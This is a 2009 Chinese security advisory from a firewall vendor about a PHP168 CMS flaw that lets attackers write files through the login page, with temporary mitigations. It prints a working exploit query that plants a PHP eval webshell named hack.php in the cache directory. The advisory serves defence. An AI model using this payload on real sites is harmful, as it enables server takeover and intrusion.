关于冰盾 | 使用条款 | 网站地图
 
关于php168通杀漏洞临时修补方法
关于php168通杀漏洞临时修补方法
作者:冰盾防火墙 网站:www.bingdun.com 日期:2009-09-10
 

  最近PHP168的最新漏洞 危险等级:极高

  漏洞测试版本:PHP168 6.0以下版本

  由于php过滤不严导致,入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。

  测试语句: ?makehtml=1&chdb[htmlname]=hack.php&chdb[path]=cache&content=?php%20@eval($_POST[hack]);?>

  目前该漏洞入侵动画已经在互联网发布出来,该漏洞造成很多网站已经遭挂马或者入侵。如果您的网站系统是php168或者此类版本,请立即检查网站cache目录下是否已经写入木马。 目前官方还未公布漏洞补丁,黑基网提供临时解决方案:

  1. 请您修改根目录下的login.php文件名

  2.如果实在怕被再次入侵可以考虑设置cache目录无脚本执行权限来临时阻止此漏洞的侵袭。

 

 

 
最新内容:
微软思科终修正TCP DoS漏洞[2009-09-10]
大学生侵入政府网站办假证涉案金额超百万[2009-09-10]
著名黑客工具CC攻击的思路及防范方法[2014-08-29]
CC攻击原理和防御软件简单介绍[2014-08-28]
绿色节能为先 谈集群服务器的功耗管理[2014-08-29]
技术应用:困扰服务器性能的文件碎片[2009-09-09]
相关内容:

合作伙伴: 黑基网 补天科技 威盾科技 站长下载 新飞金信 北京电信 ZOL应用下载
中华人民共和国增值电信业务经营许可证京ICP备14024464 公安备案号 京1081234 
版权所有©2003-2014 冰盾防火墙  www.BingDun.com 法律声明
总机:(010)51661195